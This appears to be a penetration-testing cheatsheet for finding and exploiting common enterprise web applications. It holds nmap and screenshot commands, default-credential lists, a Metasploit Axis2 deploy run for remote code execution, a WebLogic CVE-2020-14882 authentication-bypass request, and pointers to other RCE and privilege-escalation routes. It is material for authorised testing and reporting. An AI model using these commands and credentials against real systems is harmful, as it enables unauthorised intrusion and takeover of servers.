π‘οΈ Methodology Checklist
- Web port scan:
nmap -p 80,443,8000,8080,8443,8888 -sV [TARGET] - Screenshot all web services:
eyewitness --web -f hosts.txt - Triage screenshots: prioritise login pages, vendor UIs, unusual apps
- Test default credentials for all identified applications
- Axis2: default axis2/axis2 β upload malicious AAR service for RCE
- Zabbix: check API endpoints, default Admin/zabbix credentials
- vCenter: ESXi shell, DCUI, API β high-value target
- Document all identified applications and versions
π― Operational Context
Use when: Common enterprise applications identified during enumeration β cross-reference with known CVEs and default credentials for each.
Think Dumber First: nmap -sV gives app version β searchsploit app version β ExploitDB PoC. For web apps: check default creds first (admin/admin, admin/changeme). Vendor docs list default creds β always check the vendor docs.
Skip when: N/A β reference document for common app discovery.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-ports -iL scope.txt | Web port discovery across scope (feeds into EyeWitness) |
eyewitness --web -x scans/web-ports.xml -d eyewitness_output | Visual screenshot report from Nmap XML |
cat scans/web-ports.xml | aquatone -nmap -out aquatone_output | Alternative screenshotter with visual clustering |
whatweb -a3 [URL] | Aggressive web app fingerprinting for niche CMS/frameworks |
ffuf -w [WORDLIST] -u [URL]/FUZZ -mc 200,401 | Find hidden admin portals and config files |
searchsploit [APP_NAME] [VERSION] | Find CVEs for identified application version |
msfconsole -q; search axis2_deployer | Axis2 WAR deploy exploit module |
curl -s http://[TARGET_IP]/axis2/axis2-admin/ | Check for Axis2 admin panel (default: admin:axis2) |
curl -s http://[TARGET_IP]/WebSphere/console/ | Check WebSphere admin console (default: system:manager) |
curl -s http://[TARGET_IP]/nagios/ | Check Nagios panel (default: nagiosadmin:PASSW0RD) |
curl -s http://[TARGET_IP]:5480/ | vCenter VAMI interface check |
π¬ Deep Dive & Workflow
Application Discovery Workflow
# Step 1: Compile scope
cat scope.txt # IPs, FQDNs, vhosts
# Step 2: Web port scan (common ports only β don't waste time on all 65k)
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-initial -iL scope.txt
# Step 3: Visual recon
eyewitness --web -x scans/web-initial.xml -d eyewitness_out
# β Opens eyewitness_out/report.html in browser
# β Sort by "401 Unauthorized" β default login pages
# β Sort by "Default Page" β unconfigured services
# OR Aquatone (groups visually similar pages):
cat scans/web-initial.xml | aquatone -nmap -out aquatone_out -timeout 10000
# IMPORTANT: Always use -out [dirname] β without it, aquatone fails with "Failed to create output directory"
# Step 4: Deep scan interesting targets
sudo nmap -sC -sV -p- -oA scans/deepdive [TARGET_IP]EyeWitness triage tips:
401 Unauthorized+Default Page= weak cred opportunity- Sort by page title: βDashboardβ, βAdminβ, βConsoleβ = high value
- Look for Java-based stack indicators (Tomcat header, WEB-INF dirs)
- vHost routing: missing
/etc/hostsentry = wrong application served
Notable Application Abuse Paths
| Application | Detection | Default Creds | Primary Attack |
|---|---|---|---|
| Axis2 | /axis2/axis2-admin/ | admin:axis2 | Upload .aar service file β RCE |
| WebSphere | /WebSphere/console/ | system:manager | Admin console β WAR deploy |
| Zabbix | /zabbix/ | Admin:zabbix | API abuse or System.run command β RCE |
| Nagios | /nagios/ | nagiosadmin:PASSW0RD | Version-specific RCE or plugin abuse |
| WebLogic | :7001/console | weblogic:welcome1 | Java deserialization (CVE-2020-14882/14883) |
| vCenter | :443 / :5480 | administrator@vsphere.local | File upload (OVA), Struts2 RCE, SSRF |
| Wikis | Confluence, DokuWiki | varies | Search for: βpasswordβ, βkeyβ, βconfigβ, SSH keys |
Axis2 β WAR/AAR File Upload RCE
# Check for exposed admin panel
curl -s http://[TARGET_IP]:8080/axis2/axis2-admin/
# β Login page: default creds admin:axis2
# Create malicious Axis2 service file (.aar = zip with services.xml + class)
# Or use MSF module:
msf6 > use exploit/multi/http/axis2_deployer
msf6 > set RHOSTS [TARGET_IP]
msf6 > set RPORT 8080
msf6 > set USERNAME admin
msf6 > set PASSWORD axis2
msf6 > runWebLogic β Java Deserialization (CVE-2020-14882/14883)
# Check version via T3 protocol header
nmap -p 7001 --script weblogic-detect [TARGET_IP]
# CVE-2020-14882 β Authentication bypass to admin console
curl "http://[TARGET_IP]:7001/console/css/%252E%252E%252F%252E%252E%252Fconsole.portal"
# CVE-2020-14883 β RCE once authenticated/bypassed
# POST to /console/images/ with XML deserialization payload
# ysoserial is the standard toolchain for gadget chain generation
# Check ExploitDB for PoCs:
searchsploit WebLogic 2020vCenter β Attack Surface
# Identify version
curl -sk https://[TARGET_IP]/sdk | grep -i version
# CVE-2021-21985 β RCE via vSphere Client plugin (unauthenticated)
searchsploit vCenter 2021
# CVE-2021-22005 β File upload to RCE
# SSRF via /ui/vropsDrillDownServlet
# vCenter VAMI (Virtual Appliance Management): port 5480
# If Windows-based vCenter:
# β JuicyPotato or PrintSpoofer after initial foothold (SYSTEM context)The Curiosity Mindset
Default credential checklist (try before exploits):
admin:admin
admin:password
admin:[company_name]
[app_name]:password
See application-specific defaults in table above
"Golden Chain" for unknown/niche apps:
1. Fingerprint β version β searchsploit
2. Check default credentials
3. Look for file upload functionality (even for legitimate purposes)
4. Look for "Execute command" built-in features (Zabbix System.run, Jenkins Script Console)
5. Check for .git directories on web root
Scanner blind spots:
Nessus "no criticals" β check Informational for Nexus Repository, vCenter, JBoss
Manual browsing reveals: "support desk", "wiki", "monitoring" portals
osTicket "Attached Files" β RCE (never assume small apps are safe)
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Application version not visible | No version in headers or response | Check 404 error page, login page source, and /about or /version endpoints |
| Default creds list incomplete | Generic list | Search: [APP_NAME] default credentials on vendor documentation pages |
| searchsploit version match too strict | Exact version required | Search broader: searchsploit [APP_NAME] then manually filter by version range |
| Known exploit requires specific config | PoC assumptions wrong | Read PoC source; identify prerequisites (auth required, specific module enabled, etc) |
| App fingerprinted incorrectly | Wappalyzer misidentification | Confirm manually: inspect HTTP headers, HTML source, cookie names, error messages |
π Reporting Trigger
Finding Title: Common Enterprise Application Vulnerable to Known Exploit Impact: Identified enterprise application version matches known public exploit, enabling rapid exploitation without vulnerability research β reducing attacker time-to-compromise to minutes using freely available tools. Root Cause: Common enterprise application not updated to address publicly disclosed vulnerability. No asset management or vulnerability scanning tracking common application versions. Recommendation: Implement vulnerability scanning that covers common enterprise applications. Establish patch SLAs for critical CVEs. Remove or isolate vulnerable applications that cannot be immediately patched.